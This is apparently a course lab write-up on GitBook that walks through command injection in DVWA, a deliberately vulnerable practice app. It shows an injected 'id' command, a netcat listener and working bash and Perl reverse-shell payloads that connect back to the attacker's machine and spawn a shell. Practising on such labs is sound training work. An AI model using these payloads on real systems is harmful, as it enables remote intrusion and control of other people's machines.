> For the complete documentation index, see [llms.txt](https://cas-cyber.gitbook.io/cas-cybersecurity/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://cas-cyber.gitbook.io/cas-cybersecurity/web-application-security/dvwa/dvwa-exercises-2.md).

# DVWA Exercises 2

### 03. Command Injection

<div align="left"><img src="https://3977837039-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MfT0VPyK6X13Egd9pzy%2F-Mhk6cAfVYHYQi-UrlaC%2F-Mhm9KmnzbAepQHZhIr_%2Fdvwa03.png?alt=media&amp;token=3c558f9a-9115-437e-a664-08cbaf131347" alt=""></div>

Let's try to ping our host&#x20;

> 172.17.0.1

<div align="left"><img src="https://3977837039-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MfT0VPyK6X13Egd9pzy%2F-Mhk6cAfVYHYQi-UrlaC%2F-MhmJs4glCyY1SfN-3IJ%2Fdvwa04.png?alt=media&amp;token=7d5e3e4d-bb5d-4651-a54f-71cc799a6dc1" alt=""></div>

Lets try to inject another command

> 172.17.0.1; id

<div align="left"><img src="https://3977837039-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MfT0VPyK6X13Egd9pzy%2F-Mhk6cAfVYHYQi-UrlaC%2F-MhmJyWhUt3iLcoMFG2k%2Fdvwa05.png?alt=media&amp;token=ea39bc82-d5a5-4b99-8366-6b46908bbed9" alt="We get the id command returned"></div>

### 04. Command Injection Reverse Shell

Let's search for a nice cheat sheet:

{% embed url="<https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md>" %}

As you can see we get different payloads here. Let's try a bash reverse shell first:

Setup a netcat listener on port 8001

> nc -lvnp 8001

![](https://3977837039-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MfT0VPyK6X13Egd9pzy%2F-Mhk6cAfVYHYQi-UrlaC%2F-MhmOF5Bc-L7XtpSgWTr%2Freverse01.png?alt=media\&token=4e0ddb3b-5c80-431d-9b17-3ddc4e5a4cc6)

Attack payload for bash TCP:

> ; bash -i >& /dev/tcp/172.17.0.1/8001 0>&1
>
> ; /bin/bash -l > /dev/tcp/10.0.0.1/4242 0<&1 2>&1

<div align="left"><img src="https://3977837039-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MfT0VPyK6X13Egd9pzy%2F-Mhk6cAfVYHYQi-UrlaC%2F-MhmPVq5Kw_tJnK6r6x6%2Fdvwa06.png?alt=media&amp;token=96d4f7a5-b693-4178-b189-80bbc1cb5385" alt=""></div>

Both didn't work! I can't see any incoming connection on my netcat listener...

Let's try another one with perl:

```
perl -e 'use Socket;$i="172.17.0.1";$p=8001;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
```

<div align="left"><img src="https://3977837039-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MfT0VPyK6X13Egd9pzy%2F-Mhk6cAfVYHYQi-UrlaC%2F-MhmR8z6LE3wsq4U1D97%2Fdvwa07.png?alt=media&amp;token=5e03a2e2-4ad1-45d4-9c2f-b85beafe487d" alt=""></div>

And we have a reverseshell :)

![](https://3977837039-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MfT0VPyK6X13Egd9pzy%2F-Mhk6cAfVYHYQi-UrlaC%2F-MhmRItw1dJRWFqNzYPO%2Freverse02.png?alt=media\&token=c7324ff5-7b39-458b-8d2c-979a37e06972)
